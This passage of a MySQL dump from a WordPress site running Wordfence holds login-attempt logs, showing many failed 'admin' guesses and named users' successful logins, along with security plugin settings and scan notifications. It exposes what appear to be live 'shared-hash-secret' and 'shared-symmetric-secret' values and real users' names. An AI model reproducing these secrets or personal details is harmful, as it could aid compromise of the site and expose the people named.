Firefox/62.0'),(1587,8414,1566448225.434733,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0Ac&','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1588,8415,1566450590.014713,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0C','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1589,8416,1566451757.809575,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\04','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1590,8417,1566452979.125204,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0։','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1591,8418,1566457666.908264,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0g','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1592,8419,1566458865.795318,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0D','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:61.0.1) Gecko/20120101 Firefox/61.0.1'),(1593,8420,1566460081.885168,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0>iJ','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:61.0.1) Gecko/20120101 Firefox/61.0.1'),(1594,8421,1566462480.479842,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0>$','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:61.0.1) Gecko/20120101 Firefox/61.0.1'),(1595,8422,1566463591.524916,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0P','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1596,8423,1566463821.068358,1,'loginFailInvalidUsername','companyregistrator',0,'\0\0\0\0\0\0\0\0\0\0','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0'),(1597,8424,1566463833.908992,0,'loginOK','Imraan Wajoodeen CA(SA)',1,'\0\0\0\0\0\0\0\0\0\0','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0'),(1598,8425,1566467240.744919,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0gc','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1599,8426,1566468507.576450,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0/y','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1600,8427,1566469758.061916,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1601,8428,1566472247.331851,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0>t;','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:61.0.1) Gecko/20120101 Firefox/61.0.1'),(1602,8429,1566473454.640048,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0ӫ','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1603,8430,1566474652.898470,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0C','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1604,8431,1566474939.347421,0,'loginOK','Imraan Wajoodeen CA(SA)',1,'\0\0\0\0\0\0\0\0\0\0','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0'),(1605,8432,1566475983.898337,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0ӫ','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1606,8433,1566478911.046816,0,'loginOK','nazeer',3,'\0\0\0\0\0\0\0\0\0\0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.100 Safari/537.36'),(1607,8434,1566479756.130601,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0kR','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1608,8435,1566480974.539948,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0^','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1609,8436,1566482288.838777,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0gi<','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1610,8437,1566482587.484764,0,'loginOK','nazeer',3,'\0\0\0\0\0\0\0\0\0\0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.100 Safari/537.36'),(1611,8438,1566484752.168447,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0B','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1612,8439,1566485964.264007,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0g','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1613,8440,1566486831.994411,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0H','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1614,8441,1566487802.192205,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0C7v','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1615,8442,1566489837.054275,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1616,8443,1566490824.954725,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1617,8444,1566491885.902479,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0m{','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1618,8445,1566492885.815443,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0@Z(','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1619,8446,1566496045.220216,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:61.0.1) Gecko/20120101 Firefox/61.0.1'),(1620,8447,1566497185.618654,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0>iJ','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:61.0.1) Gecko/20120101 Firefox/61.0.1'),(1621,8448,1566499235.129103,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0g<','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1622,8449,1566647516.565291,0,'loginOK','Imraan Wajoodeen CA(SA)',1,'\0\0\0\0\0\0\0\0\0\0','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0'),(1623,8450,1566647536.810779,0,'loginOK','Imraan Wajoodeen CA(SA)',1,'\0\0\0\0\0\0\0\0\0\0','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0'),(1624,8451,1566740223.496517,0,'loginOK','Imraan Wajoodeen CA(SA)',1,'\0\0\0\0\0\0\0\0\0\0fy','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0'),(1625,8466,1566807589.868373,0,'loginOK','nazeer',3,'\0\0\0\0\0\0\0\0\0\0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.100 Safari/537.36'),(1626,8467,1566825111.462623,0,'loginOK','Imraan Wajoodeen CA(SA)',1,'\0\0\0\0\0\0\0\0\0\0fy','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0'),(1627,8474,1566892295.627431,0,'loginOK','nazeer',3,'\0\0\0\0\0\0\0\0\0\0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.100 Safari/537.36'),(1628,8475,1566894727.353452,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\03','Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2; Trident/4.0)'),(1629,8490,1566911131.114567,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0g_\r','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:61.0.1) Gecko/20120101 Firefox/61.0.1'),(1630,8491,1566913306.159748,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1631,8492,1566916623.256514,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0k','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1632,8493,1566920119.466393,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1633,8494,1566923623.595170,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0e2','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1634,8495,1566924841.329332,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0#','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1635,8496,1566927082.762594,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0옆','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1636,8497,1566928261.817115,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0\n','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1637,8498,1566930801.852836,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0νL','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1638,8499,1566931985.870329,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0EF','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1639,8500,1566934386.738253,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1640,8501,1566935665.085458,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0g','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1641,8502,1566938131.309562,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0YD','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1642,8503,1566941875.970757,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0[[','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1643,8504,1566943228.565545,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0Y','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1644,8505,1566944415.288468,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0W','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1645,8506,1566949570.852048,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0;','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1646,8507,1566950816.343473,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0.','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1647,8508,1566952067.906597,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0>z','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1648,8510,1566966526.601184,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0\"','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1649,8511,1566969236.476325,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0_','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1650,8512,1566970637.220776,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1651,8513,1566971792.825625,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0Y','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1652,8514,1566973245.877942,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0E','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1653,8515,1566976183.619928,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0z','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1654,8516,1566977308.439679,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0%k','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1655,8517,1566981512.288152,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0.-K','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1656,8518,1566982776.968179,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0\"D','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1657,8519,1566985664.133258,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0DS','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1658,8520,1566987339.335640,0,'loginOK','nazeer',3,'\0\0\0\0\0\0\0\0\0\0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36'),(1659,8521,1566989719.942567,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0&V','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1660,8522,1566999048.878297,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0Y','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1661,8523,1567001334.664548,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0X','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1662,8524,1567002363.646496,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0Hv','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1663,8525,1567006934.207729,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0c\"','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1664,8526,1567008162.919654,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0LhC','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1665,8527,1567012913.496132,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0-M','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1666,8528,1567015251.133480,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0!#','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1667,8529,1567020057.544496,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0%k','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1668,8530,1567021197.686484,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0+','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1669,8531,1567022530.831125,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0g','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1670,8532,1567027484.013708,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0D9','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:61.0.1) Gecko/20120101 Firefox/61.0.1'),(1671,8533,1567028725.821340,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0g','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1672,8534,1567029943.770233,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1673,8535,1567038754.613465,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0m','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1674,8536,1567041310.688197,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0_It','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1675,8537,1567043910.433784,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1676,8538,1567046472.462551,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0&V','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1677,8539,1567049065.950364,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0^','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1678,8553,1567053022.792297,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0E','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1679,8554,1567054330.527470,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1680,8555,1567056957.113967,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0LhC','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1681,8556,1567058233.589323,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0^','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0');
/*!40000 ALTER TABLE `wpxb_wflogins` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpxb_wfls_2fa_secrets`
--

DROP TABLE IF EXISTS `wpxb_wfls_2fa_secrets`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpxb_wfls_2fa_secrets` (
  `id` int(11) unsigned NOT NULL AUTO_INCREMENT,
  `user_id` bigint(20) unsigned NOT NULL,
  `secret` tinyblob NOT NULL,
  `recovery` blob NOT NULL,
  `ctime` int(10) unsigned NOT NULL,
  `vtime` int(10) unsigned NOT NULL,
  `mode` enum('authenticator') NOT NULL DEFAULT 'authenticator',
  PRIMARY KEY (`id`),
  KEY `user_id` (`user_id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpxb_wfls_2fa_secrets`
--

LOCK TABLES `wpxb_wfls_2fa_secrets` WRITE;
/*!40000 ALTER TABLE `wpxb_wfls_2fa_secrets` DISABLE KEYS */;
/*!40000 ALTER TABLE `wpxb_wfls_2fa_secrets` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpxb_wfls_settings`
--

DROP TABLE IF EXISTS `wpxb_wfls_settings`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpxb_wfls_settings` (
  `name` varchar(191) NOT NULL DEFAULT '',
  `value` longblob DEFAULT NULL,
  `autoload` enum('no','yes') NOT NULL DEFAULT 'yes',
  PRIMARY KEY (`name`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpxb_wfls_settings`
--

LOCK TABLES `wpxb_wfls_settings` WRITE;
/*!40000 ALTER TABLE `wpxb_wfls_settings` DISABLE KEYS */;
INSERT INTO `wpxb_wfls_settings` VALUES ('allow-xml-rpc','1','yes'),('captcha-stats','{\"counts\":[0,0,0,0,0,0,0,0,0,0,0],\"avg\":0}','yes'),('delete-deactivation','','yes'),('enable-auth-captcha','','yes'),('global-notices','[]','yes'),('ip-source','','yes'),('ip-trusted-proxies','','yes'),('last-secret-refresh','1557903227','yes'),('ntp-offset','1.0320544242859','yes'),('recaptcha-threshold','0.5','yes'),('remember-device','','yes'),('remember-device-duration','2592000','yes'),('require-2fa-grace-period-enabled','','yes'),('require-2fa.administrator','','yes'),('shared-hash-secret','553557856ab768b0af42c5038260633d3543502f14ce65f33b85fe9ffb789d4b','yes'),('shared-symmetric-secret','dfe703b4a0d1f3e1eca73dea2af71d9d353fded910c4371d28088c9424b88b3f','yes'),('use-ntp','','yes'),('whitelisted','','yes'),('xmlrpc-enabled','1','yes');
/*!40000 ALTER TABLE `wpxb_wfls_settings` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpxb_wfnotifications`
--

DROP TABLE IF EXISTS `wpxb_wfnotifications`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpxb_wfnotifications` (
  `id` varchar(32) NOT NULL DEFAULT '',
  `new` tinyint(3) unsigned NOT NULL DEFAULT 1,
  `category` varchar(255) NOT NULL,
  `priority` int(11) NOT NULL DEFAULT 1000,
  `ctime` int(10) unsigned NOT NULL,
  `html` text NOT NULL,
  `links` text NOT NULL,
  PRIMARY KEY (`id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpxb_wfnotifications`
--

LOCK TABLES `wpxb_wfnotifications` WRITE;
/*!40000 ALTER TABLE `wpxb_wfnotifications` DISABLE KEYS */;
INSERT INTO `wpxb_wfnotifications` VALUES ('site-AEAAAAA',0,'wfplugin_scan',502,1554716280,'<a href=\"http://companyregistration.online/wp-admin/admin.php?page=WordfenceScan\">1 issue found in most recent scan</a>','[]'),('site-AIAQAAA',0,'wfplugin_updates',502,1558594254,'<a href=\"http://companyregistration.online/wp-admin/update-core.php\">Updates are available for 3 plugins</a>','[]'),('site-BQAAAAA',0,'wfplugin_updates',502,1554706542,'<a href=\"http://companyregistration.online/wp-admin/update-core.php\">An update is available for 1 plugin</a>','[]'),('site-FAAQAAA',0,'wfplugin_updates',502,1559199672,'<a href=\"http://companyregistration.online/wp-admin/update-core.php\">Updates are available for 3 plugins</a>','[]'),('site-G4AAAAA',0,'wfplugin_scan',502,1559892394,'<a href=\"http://companyregistration.online/wp-admin/admin.php?page=WordfenceScan\">1 issue found in most recent scan</a>','[]'),('site-IIAQAAA',0,'wfplugin_updates',502,1559371566,'<a href=\"http://companyregistration.online/wp-admin/update-core.php\">Updates are available for 2 plugins</a>','[]'),('site-IUAAAAA',0,'wfplugin_updates',502,1555312357,'<a href=\"http://companyregistration.online/wp-admin/update-core.php\">Updates are available for 2 plugins</a>','[]'),('site-LEAAAAA',0,'wfplugin_updates',502,1557740249,'<a href=\"http://companyregistration.online/wp-admin/update-core.php\">An update is available for 1 theme</a>','[]'),('site-QAAQAAA',0,'wfplugin_updates',502,1560280894,'<a href=\"http://companyregistration.online/wp-admin/update-core.php\">An update is available for 1 plugin</a>','[]'),('site-QIAQAAA',0,'wfplugin_scan',502,1560320974,'<a href=\"http://companyregistration.online/wp-admin/admin.php?page=WordfenceScan\">1 issue found in most recent scan</a>','[]'),('site-S4AQAAA',0,'wfplugin_updates',502,1560428728,'<a href=\"http://companyregistration.online/wp-admin/update-core.php\">An update is available for 1 plugin</a>','[]'),('site-SUAQAAA',0,'wfplugin_scan',502,1564557046,'<a href=\"https://companyregistration.online/wp-admin/admin.php?page=WordfenceScan\">33 issues found in most recent scan</a>','[]'),('site-T4AQAAA',0,'wfplugin_updates',502,1560755230,'<a href=\"http://companyregistration.online/wp-admin/update-core.php\">Updates are available for 2 plugins</a>','[]'),('site-XYAQAAA',0,'wfplugin_updates',502,1563456087,'<a href=\"http://companyregistration.online/wp-admin/update-core.php\">An update is available for 1 plugin</a>','[]'),('site-2QAQAAA',0,'wfplugin_updates',502,1563543565,'<a href=\"https://companyregistration.online/wp-admin/update-core.php\">Updates are available for 3 plugins</a>','[]'),('site-3IAQAAA',0,'wfplugin_updates',502,1563656114,'<a href=\"http://companyregistration.online/wp-admin/update-core.php\">An update is available for 1 plugin</a>','[]'),('site-3UAQAAA',0,'wfplugin_updates',502,1563656398,'<a href=\"http://companyregistration.online/wp-admin/update-core.php\">An update is available for 1 plugin</a>','[]'),('site-6YAQAAA',0,'wfplugin_updates',502,1564419693,'<a href=\"https://companyregistration.online/wp-admin/update-core.php\">An update is available for 1 plugin</a>','[]'),('site-BQBAAAA',0,'wfplugin_updates',502,1564493700,'<a href=\"https://companyregistration.online/wp-admin/update-core.php\">An update is available for 1 plugin</a>','[]'),('site-CIBAAAA',0,'wfplugin_scan',502,1564733341,'<a href=\"https://companyregistration.online/wp-admin/admin.php?page=WordfenceScan\">2 issues found in most recent scan</a>','[]'),('site-EUBAAAA',0,'wfplugin_updates',502,1564667017,'<a href=\"https://companyregistration.online/wp-admin/update-core.php\">Updates are available for 2 plugins</a>','[]'),('site-GEBAAAA',0,'wfplugin_updates',502,1564994075,'<a href=\"https://companyregistration.online/wp-admin/update-core.php\">Updates are available for 3 plugins</a>','[]'),('site-GMBAAAA',0,'wfplugin_scan',502,1566904103,'<a href=\"https://companyregistration.online/wp-admin/admin.php?page=WordfenceScan\">3 issues found in most recent scan</a>','[]'),('site-H4BAAAA',0,'wfplugin_updates',502,1565270312,'<a href=\"https://companyregistration.online/wp-admin/update-core.php\">An update is available for 1 plugin</a>','[]'),('site-KMBAAAA',0,'wfplugin_updates',502,1566475322,'<a href=\"https://companyregistration.online/wp-admin/update-core.php\">An update is available for 1 plugin</a>','[]'),('site-S4BAAAA',0,'wfplugin_updates',502,1566661393,'<a href=\"https://companyregistration.online/wp-admin/update-core.php\">An update is available for 1 